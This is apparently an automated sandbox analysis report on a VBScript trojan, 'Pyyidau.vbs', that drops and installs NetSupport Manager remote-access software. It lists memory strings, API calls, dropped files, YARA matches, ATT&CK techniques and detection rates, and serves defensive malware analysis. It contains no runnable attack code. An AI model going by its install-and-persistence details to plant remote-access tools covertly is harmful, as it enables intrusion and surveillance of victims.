                                Source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: echo\tempfile.$$$\autoexec.nt\autoexec.tmpGetSystemWow64DirectoryAkernel32*old_wndproc == fpe:\nsmsrc\nsm\1410\1410\nt\winst32.cPROGMANrb+.lnk\Profiles\All Users\Start Menu\Programs\YesOnNSMWControl32NSMMainSeShutdownPrivilegebufAssert failed, file %hs, line %d
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: jFoxitReaderSubmitPeakFrameIntelNSM AppBar Callback MessageShell_TrayWnd
                                Source: MSIF373.tmp, MSIF985.tmp, MSI1387.tmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: lProgman
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: jProgman
                                Source: winst64.exe, 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: %04d-%02d-%02d %02d:%02d:%02d.%03d defaultPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session ManagerDllUnregisterServerDllRegisterServer\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dclient32.inirtclient32u.iniSoftware\Policies\NetSupport\Client\StandardclientScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %sokerrorPCIShellExt64.newPCIShellExt64.oldPCIShellExt64.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: MSIF373.tmp, MSIF985.tmp, MSI1387.tmpBinary or memory string: PROGMAN
                                Source: pcicfgui_client.exe, 00000022.00000002.114293124962.000000006C372000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: Sorry, this is not supported on versions of Windows NT before 4.0. Please refer to the help file for details on how to do this in Program Manager. Configure TCP/IP Client Browsing+&Broadcast Addresses (or Client Addresses):.Print Files (*.prn)|*.prn|All Files (*.*)|*.*|.Sound Files (*.wav)|*.wav|All Files (*.*)|*.*|
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanError closing winsta, e=%d
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_005F6474
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,25_2_006086E2
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_00602744
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,25_2_00602839
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoW,25_2_006028E0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,25_2_0060293B
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,25_2_00602B0C
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,25_2_00602BF8
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,25_2_00602BCE
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,25_2_00602C5F
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,25_2_00602C9B
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,25_2_0060BE77
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_00936474
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,27_2_009486E2
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_00942744
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoW,27_2_009428E0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,27_2_00942839
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,27_2_0094293B
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,27_2_00942BCE
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,27_2_00942BF8
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,27_2_00942B0C
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,27_2_00942C9B
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,27_2_00942C5F
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,27_2_0094BE77
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_0079C73C
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_00794878
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,28_2_0079C831
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,28_2_0079C8D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,28_2_0079C933
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,28_2_0079CB04
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,28_2_0079CBF0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,28_2_0079CBC6
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,28_2_0079CC57
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,28_2_0079CC93
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,28_2_007A576A
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,28_2_007A5E2D
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_01006474
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_01012744
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,29_2_010186E2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,29_2_0101293B
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,29_2_01012839
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoW,29_2_010128E0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,29_2_01012B0C
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,29_2_01012BCE
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,29_2_01012BF8
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,29_2_01012C5F
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,29_2_01012C9B
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,29_2_0101BE77
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBF9E0 OpenServiceW,GetLastError,SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,SetupDiEnumDeviceInfo,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,SetupDiCallClassInstaller,GetLastError,SetupDiDestroyDeviceInfoList,29_2_00FBF9E0
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI1387.tmpQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI1387.tmpQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection,25_2_005DF030
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D5490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,25_2_005D5490
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005F0EEB GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,25_2_005F0EEB
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DF6D0 GetModuleFileNameW,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetCurrentProcess,FreeLibrary,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,25_2_005DF6D0
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BlobJump to behavior
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C7600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,25_2_005C7600
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00907600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,27_2_00907600
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00774E20 SHParseDisplayName,SHBindToParent,CoTaskMemFree,28_2_00774E20
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD7600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,29_2_00FD7600
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, type: DROPPED
                                Source: Yara match | File source: C:\Config.Msi\e6def9.rbs, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF1F8.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF314.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIE6B9.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, type: DROPPED
                                Source: Yara match | File source: C:\Windows\System32\drivers\nskbfltr.sys, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF2D5.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIEF23.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF917.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF691.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIE748.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSI23B6.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF0BB.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF373.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIE708.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF869.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF8D7.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSI37C0.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\System32\client32provider.dll, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF238.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSI1387.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF985.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF10A.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF179.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF1A9.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF149.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSI23E6.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\MSIF6C1.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\e6defa.msi, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\vrep[1].msi, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\vrep.msi, type: DROPPED
                                Source: Yara match | File source: C:\Windows\Installer\e6def7.msi, type: DROPPED
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information221
                                Scripting
                                1
                                Replication Through Removable Media
                                631
                                Windows Management Instrumentation
                                221
                                Scripting
                                1
                                LSASS Driver
                                11
                                Disable or Modify Tools
                                21
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                3
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                1
                                LSASS Driver
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory11
                                Peripheral Device Discovery
                                Remote Desktop Protocol21
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                1
                                DLL Side-Loading
                                1
                                Access Token Manipulation
                                4
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares2
                                Clipboard Data
                                11
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts22
                                Command and Scripting Interpreter
                                42
                                Windows Service
                                42
                                Windows Service
                                12
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Scheduled Task/Job
                                1
                                Scheduled Task/Job
                                112
                                Process Injection
                                1
                                DLL Side-Loading
                                LSA Secrets157
                                System Information Discovery
                                SSHKeylogging114
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media12
                                Service Execution
                                RC Scripts1
                                Scheduled Task/Job
                                1
                                File Deletion
                                Cached Domain Credentials2
                                Query Registry
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote Services1
                                PowerShell
                                Startup ItemsStartup Items132
                                Masquerading
                                DCSync1061
                                Security Software Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Modify Registry
                                Proc Filesystem66
                                Virtualization/Sandbox Evasion
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt66
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow2
                                Process Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                Access Token Manipulation
                                Network Sniffing11
                                Application Window Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                                Process Injection
                                Input Capture1
                                System Owner/User Discovery
                                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                [Behavior graph: ID 1561295, Sample: Pyyidau.vbs, Startdate: 23/11/2024, Architecture: WINDOWS, Score: 100]

                                Source | Detection | Scanner | Label | Link
                                Pyyidau.vbs | 16% | ReversingLabs | Script-WScript.Trojan.Snake
                                Pyyidau.vbs | 26% | Virustotal | | Browse
                                Source | Detection | Scanner | Label | Link
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXE | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe | 5% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL | 5% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL | 8% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs
